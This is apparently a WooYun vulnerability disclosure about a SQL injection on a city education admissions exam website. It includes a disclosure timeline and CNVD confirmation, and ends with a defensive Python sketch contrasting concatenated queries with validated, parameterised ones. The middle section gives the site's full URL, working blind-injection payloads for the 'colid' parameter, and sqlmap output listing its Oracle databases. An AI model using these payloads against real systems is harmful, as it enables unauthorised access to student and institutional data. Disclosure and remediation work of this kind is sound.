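2015-01-07: Details reported to the vendor; awaiting vendor handling
2015-01-12: Vendor confirmed; details disclosed to the vendor only
2015-01-22: Details disclosed to core white hats and experts in related fields
2015-02-01: Details disclosed to regular white hats
2015-02-11: Details disclosed to intern white hats
2015-02-21: Details disclosed to the public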
SQL injection on a city's Education Admissions Examination Authority website leads to information disclosure
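I found this myself; afterwards I searched WooYun and saw that someone had already submitted it: "WooYun: SQL injection on a city's Education Admissions Examination Authority website puts student information at risk of disclosure". The parameter is different, though, so I submitted it as well. The parameter in the earlier submission was oid. The link I am submitting is http://www.zhaokao.net/pingjia_pic.jsp?pid=0&colid=18496 and the parameter is colid.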
Place: GET
Parameter: colid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=0&colid=18496) AND 2597=2597 AND (7497=7497

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: pid=0&colid=18496) AND 3035=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(66)||CHR(72)||CHR(101),5) AND (5313=5313
---
web application technology: JSP
back-end DBMS: Oracle
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] VCMS
[*] WKSYS
[*] WMSYS
[*] XDB
It ran for several days; because of the network speed, the table names only finished enumerating today.
While I was at it, I also ran a count.
Filtering
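The report names its fix in one word. As an added example (not code from the report or from the affected site), the sketch below shows what that fix amounts to for a numeric parameter such as colid: an allow-list check plus bind variables, set beside the concatenated query that the payload shape implies. SQLite stands in for Oracle, and the table demo_pics, its rows and the parenthesised query shape are assumptions made for illustration.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the back end: one table, two sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE demo_pics (pid INTEGER, colid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO demo_pics VALUES (?, ?, ?)",
        [(0, 18496, "constructed row A"), (0, 20001, "constructed row B")],
    )
    return conn


# colid value copied from the boolean-based payload in the sqlmap output above.
PAGE_PAYLOAD = "18496) AND 2597=2597 AND (7497=7497"


def lookup_vulnerable(conn, pid, colid):
    # Assumed shape of the flawed query: request text pasted inside parentheses,
    # so a ")" in the parameter closes the clause and the rest is parsed as SQL.
    sql = ("SELECT title FROM demo_pics WHERE (pid = " + pid
           + " AND colid = " + colid + ")")
    return [row[0] for row in conn.execute(sql)]


_ID = re.compile(r"[0-9]{1,9}")


def parse_id(raw):
    # Filtering as an allow-list: ASCII digits only, bounded length.
    if not isinstance(raw, str) or not _ID.fullmatch(raw):
        raise ValueError("rejected non-numeric id")
    return int(raw)


def lookup_hardened(conn, pid, colid):
    # Layer 1: type check. Layer 2: bind variables, so data never becomes SQL.
    params = (parse_id(pid), parse_id(colid))
    sql = "SELECT title FROM demo_pics WHERE (pid = ? AND colid = ?)"
    return [row[0] for row in conn.execute(sql, params)]


def lookup_bound_only(conn, pid, colid):
    # Binding without validation: the payload is compared as one plain value.
    sql = "SELECT title FROM demo_pics WHERE (pid = ? AND colid = ?)"
    return [row[0] for row in conn.execute(sql, (pid, colid))]


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_vulnerable(db, "0", PAGE_PAYLOAD))
    print("bound only:  ", lookup_bound_only(db, "0", PAGE_PAYLOAD))
    try:
        lookup_hardened(db, "0", PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened:    ", exc)
```

In the JSP and Oracle stack the report describes, the same two layers are integer parsing of the request parameter and a JDBC PreparedStatement with ? placeholders.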
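Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-01-12 11:03
CNVD confirmed and reproduced the vulnerability as described. It has been passed to CNCERT for dispatch to the Tianjin sub-center, which will follow up and coordinate with the organization that administers the website to handle it.
None yet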